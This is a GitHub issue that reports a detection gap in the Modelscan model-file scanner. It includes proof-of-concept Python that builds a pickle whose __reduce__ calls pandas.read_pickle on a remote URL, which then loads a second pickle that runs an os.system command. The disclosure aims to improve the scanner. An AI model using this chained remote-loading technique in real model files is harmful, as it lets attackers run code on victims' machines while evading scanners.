Skip to content

Missing detection for calls to pandas.read_pickle import #269

@AndrewDzzz

Description

@AndrewDzzz

Describe the bug
Using pandas.read_pickle to exec remote pickle file.

To Reproduce
Steps to reproduce the behavior:

  1. Create a malicious pickle file and load this file to a website, for example here we use Github.
import pandas as pd

class hack:
    def __reduce__(self):
        return __import__('os').system, ("touch /tmp/hack",)

with open("hack.pickle", "wb") as f:
    pickle.dump(hack(), f)

And create a repo in Github and send it to Github.

  1. Create a pickle file with pandas.read_pickle call in it:
import pandas as pd

class LookGoodPickle:
    def __reduce__(self):
        return __import__('pandas').read_pickle, ("https://raw.githubusercontent.com/{your-repo}/main/hack.pickle",)

with open("LookGoodPickle.pickle", "wb") as f:
    pickle.dump(LookGoodPickle(), f)
  1. Run the Modelscan tool on the created pickle file:
    modelscan -p LookGoodPickle.pickle

Expected behavior
If you pickle.load LookGoodPickle.pickle, it will visit that website and pickle.load hack.pickle.

Screenshots
If applicable, add screenshots to help explain your problem.

Environment (please complete the following information):

  • OS [e.g. macOS 14.5 (Intel)]
  • Modelscan Version [e.g. v0.84]
  • Describe the model serialization format that triggered this error (if applicable): Pickle

Additional context
We recommend to label pandas.read_pickle because it can visit an unknown link and almost all machine learning environment has this library.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions